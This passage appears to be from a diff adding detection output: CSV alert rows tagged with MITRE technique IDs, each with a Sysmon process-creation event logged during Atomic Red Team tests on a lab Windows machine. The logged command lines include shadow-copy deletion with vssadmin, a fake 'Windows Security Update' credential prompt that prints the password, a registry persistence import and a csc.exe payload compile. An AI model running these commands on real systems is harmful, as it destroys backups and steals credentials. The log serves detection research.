+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:47:40.849</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D80C-5D31-0000-001005542B00</Data>
+    <Data Name=""ProcessId"">1348</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547660.70604,2019-07-19T18:47:40.706040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;vssadmin.exe delete shadows /all /quiet&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:47:40.691438Z"">
+    </TimeCreated>
+    <EventRecordID>3638</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:47:40.568</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D80C-5D31-0000-0010223C2B00</Data>
+    <Data Name=""ProcessId"">6896</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;vssadmin.exe delete shadows /all /quiet&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547660.691438,2019-07-19T18:47:40.691438+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:47:37.215704Z"">
+    </TimeCreated>
+    <EventRecordID>3637</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:47:37.170</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D809-5D31-0000-001072292B00</Data>
+    <Data Name=""ProcessId"">980</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547657.127263,2019-07-19T18:47:37.127263+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:47:37.096237Z"">
+    </TimeCreated>
+    <EventRecordID>3633</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:47:37.083</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D809-5D31-0000-00100A242B00</Data>
+    <Data Name=""ProcessId"">3968</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,PromptForCredential,powershell,PromptForCredential) in event with Command Line (powershell.exe  -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot;) in directory : ( C:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:46:51.957887Z"">
+    </TimeCreated>
+    <EventRecordID>3631</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:46:51.935</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D7DB-5D31-0000-0010B5A82A00</Data>
+    <Data Name=""ProcessId"">4452</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell.exe  -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D7DB-5D31-0000-001089A52A00</Data>
+    <Data Name=""ParentProcessId"">4256</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe  -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:46:51.957887Z"">
+    </TimeCreated>
+    <EventRecordID>3631</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:46:51.935</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D7DB-5D31-0000-0010B5A82A00</Data>
+    <Data Name=""ProcessId"">4452</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell.exe  -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D7DB-5D31-0000-001089A52A00</Data>
+    <Data Name=""ParentProcessId"">4256</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547611.957887,2019-07-19T18:46:51.957887+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:46:51.883827Z"">
+    </TimeCreated>
+    <EventRecordID>3630</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:46:51.871</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D7DB-5D31-0000-001089A52A00</Data>
+    <Data Name=""ProcessId"">4256</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1563547579.443587,2019-07-19T18:46:19.443587+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe&quot; /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:46:19.052666Z"">
+    </TimeCreated>
+    <EventRecordID>3617</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:46:19.023</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D7BB-5D31-0000-0010E7FE2900</Data>
+    <Data Name=""ProcessId"">2056</Data>
+    <Data Name=""Image"">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe</Data>
+    <Data Name=""FileVersion"">4.7.3190.0 built by: NET472REL1LAST_C</Data>
+    <Data Name=""Description"">Visual C# Command Line Compiler</Data>
+    <Data Name=""Product"">Microsoft® .NET Framework</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe&quot; /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547579.052666,2019-07-19T18:46:19.052666+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:45:56.069498Z"">
+    </TimeCreated>
+    <EventRecordID>3616</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:45:56.040</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D7A4-5D31-0000-001020C62900</Data>
+    <Data Name=""ProcessId"">4080</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.743506,2019-07-19T18:49:32.743506+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:32.728253Z"">
+    </TimeCreated>
+    <EventRecordID>3695</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:32.710</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010CA5B3100</Data>
+    <Data Name=""ProcessId"">956</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
